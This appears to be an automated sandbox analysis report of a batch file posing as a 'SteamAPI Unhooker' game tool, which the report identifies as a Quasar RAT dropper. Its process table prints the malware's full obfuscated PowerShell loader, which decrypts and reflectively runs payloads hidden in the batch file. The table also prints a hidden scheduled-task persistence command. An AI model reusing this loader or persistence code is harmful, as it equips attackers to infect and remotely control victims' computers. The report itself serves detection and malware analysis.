Analysis Overview
SHA256
3ff8b6a041a96625d730dfe770eb6e84be8ce99fc50a0027724e48394f053308
Threat Level: Known bad
The file SteamAPI Unhooker.bat was found to be: Known bad.
Malicious Activity Summary
Quasar RAT
Quasar payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Sets service image path in registry
Checks computer location settings
Checks BIOS information in registry
Executes dropped EXE
Looks up external IP address via web service
Suspicious use of SetThreadContext
Drops file in System32 directory
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Checks processor information in registry
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Uses Task Scheduler COM API
Runs ping.exe
Creates scheduled task(s)
Suspicious use of SetWindowsHookEx
Suspicious use of UnmapMainImage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-28 13:52
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-28 13:52
Reported
2024-05-28 13:58
Platform
win10-20240404-en
Max time kernel
300s
Max time network
256s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 4072 created 580 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Install.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | c:\windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | c:\windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83 | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx | c:\windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 4072 set thread context of 1056 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\SCHTASKS.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 28 May 2024 13:54:19 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={68B30AEA-E7BA-4E60-8A91-D01B9BF16C6E}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716904458" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Image | Command line |
| --- | --- |
| C:\Windows\system32\winlogon.exe | winlogon.exe |
| C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k dcomlaunch -s LSM |
| C:\Windows\system32\dwm.exe | "dwm.exe" |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s gpsvc |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s Schedule |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localservice -s nsi |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s UserManager |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localservice -s EventSystem |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s Themes |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k networkservice -s NlaSvc |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k networkservice -s Dnscache |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s SENS |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localservice -s netprofm |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted |
| C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k appmodel -s StateRepository |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection |
| C:\Windows\System32\spoolsv.exe | C:\Windows\System32\spoolsv.exe |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k networkservice -s CryptSvc |
| C:\Windows\sysmon.exe | C:\Windows\sysmon.exe |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s WpnService |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s Browser |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc |
| c:\windows\system32\sihost.exe | sihost.exe |
| C:\Windows\system32\wbem\unsecapp.exe | C:\Windows\system32\wbem\unsecapp.exe -Embedding |
| c:\windows\system32\taskhostw.exe | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker |
| C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE |
| C:\Windows\System32\RuntimeBroker.exe | C:\Windows\System32\RuntimeBroker.exe -Embedding |
| C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localservice -s CDPSvc |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV |
| C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc |
| C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service |
| c:\windows\system32\svchost.exe | c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc |
| C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} |
| C:\Windows\system32\ApplicationFrameHost.exe | C:\Windows\system32\ApplicationFrameHost.exe -Embedding |
| C:\Windows\System32\InstallAgent.exe | C:\Windows\System32\InstallAgent.exe -Embedding |
| C:\Windows\system32\DllHost.exe | C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F} |
| C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SteamAPI Unhooker.bat" |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('F+5wamWtVzd3aK2bnS7nWh4XV0PZc2pVZ9YG0yRK5cI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lnHVCKXb70Ny+fnCAwMhpw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fLkgt=New-Object System.IO.MemoryStream(,$param_var); $wtCVF=New-Object System.IO.MemoryStream; $XRlUB=New-Object System.IO.Compression.GZipStream($fLkgt, [IO.Compression.CompressionMode]::Decompress); $XRlUB.CopyTo($wtCVF); $XRlUB.Dispose(); $fLkgt.Dispose(); $wtCVF.Dispose(); $wtCVF.ToArray();}function execute_function($param_var,$param2_var){ $PEWwL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $iVLBa=$PEWwL.EntryPoint; $iVLBa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\SteamAPI Unhooker.bat';$OJTBF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\SteamAPI Unhooker.bat').Split([Environment]::NewLine);foreach ($Wvrxg in $OJTBF) { if ($Wvrxg.StartsWith(':: ')) { $TvDjF=$Wvrxg.Substring(3); break; }}$payloads_var=[string[]]$TvDjF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_817_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_817.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force |
| C:\Windows\sysWOW64\wbem\wmiprvse.exe | C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding |
| C:\Windows\SysWOW64\WScript.exe | "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_817.vbs" |
| C:\Windows\SysWOW64\cmd.exe | C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_817.bat" " |
| C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
